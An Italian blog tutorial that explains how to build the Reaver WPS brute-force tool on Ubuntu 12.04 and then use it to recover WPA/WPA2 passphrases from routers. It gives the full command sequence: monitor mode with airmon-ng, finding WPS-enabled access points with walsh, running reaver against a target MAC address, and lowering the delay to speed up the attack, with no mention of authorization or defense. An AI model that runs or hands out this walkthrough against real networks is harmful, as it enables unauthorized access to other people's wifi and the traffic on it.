Chiunque sia appassionato di sicurezza informatica sa che da un po’ di tempo la funzione wps dei router non è molto sicura.
Prendo la descrizione dall’autore di reaver:
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
Vediamo come compilare reaver su ubuntu 12.04
Aggiorniamo la lista pacchetti:
sudo apt-get update
Installiamo le dipendenze:
sudo apt-get install subversion libsqlite3-dev make build-essential libpcap0.8-dev
Scarichiamo reaver:
cd
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps
Iniziamo la compilazione:
cd reaver-wps/src
./configure
Compiliamo:
make
Installiamo:
sudo make install
Proviamo ad usarlo:D
sudo -s
(per vedere le nostre schede di rete: iwconfig)
airmon-ng start wlan0
Per scansionare le reti wifi:
iwlist scan
Oppure, potremo usare il tool di reaver per individuare i router con wps attivo:
./walsh -i mon0
Una volta individuati i mac address basta eseguire reaver cosi:
reaver -i mon0 -b XX:14:XX:85:XX:84 -vv
Per velocizzare gli attacchi è possibile diminuire il delay ma molti router non supportano questa opzione ;)
Per diminuire il delay basta aggiungere il parametri -d
reaver -i mon0 -b XX:14:XX:85:XX:84 -vv -d 0
Comunque ecco un piccolo video tutorial:
E vi potrebbe interessare anche questo articolo:
wifite v2 : Easy wifi cracking :)
Per avere un help, digitiamo:
reaver